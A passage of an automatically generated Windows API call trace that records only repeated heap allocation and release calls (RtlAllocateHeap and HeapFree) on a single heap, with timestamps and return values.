dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.858] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.859] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0191.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.862] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.864] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.865] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.865] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.867] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.867] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.869] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.871] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.874] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.875] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0191.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0191.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.892] HeapFree (in: 